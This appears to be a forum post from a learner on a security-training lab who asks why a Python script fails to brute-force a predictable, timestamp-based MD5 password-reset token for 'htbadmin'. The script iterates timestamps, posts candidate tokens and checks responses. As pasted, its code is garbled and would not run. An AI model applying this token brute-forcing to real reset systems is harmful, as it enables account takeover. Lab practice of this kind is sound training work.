Broken authentication predectibale reset token Question1

Hello All,

Need some help. I have been trying to get the predictable token on page http://url/question1/
I am not very well versed in Python scripting so i just used the mentioned on the module page and modified it. I have tried various combinations such as step value in for loop (1000 Milliseconds considering the hint provided in question) The script i used is as below. I have already tried epoch time displayed on the page for htbuser local and GMT, with and without milliseconds with for loop steps as 1 and 1000 respectively. What am i missing or doing incorrect?

from hashlib import md5
import requests
from sys import exit
from time import time

url = “URL/question1/”

to have a wide window try to bruteforce starting from 120seconds ago

now = 1687334364000
start_time = now - 10000
fail_text = “Wrong token”

loop from start_time to now. + 1 is needed because of how range() works

for x in range(start_time, now + 10000, 1000):
# get token md5
token = “htbadmin” + str(x)
md5_token = md5(str(token).encode()).hexdigest()
data = {
“submit”: “check”,
“token”: md5_token

print("checking {} {}".format(token, md5_token))

# send the request
res =, data=data)

# response text check
if not fail_text in res.text:
    print("[*] Congratulations! raw reply printed before")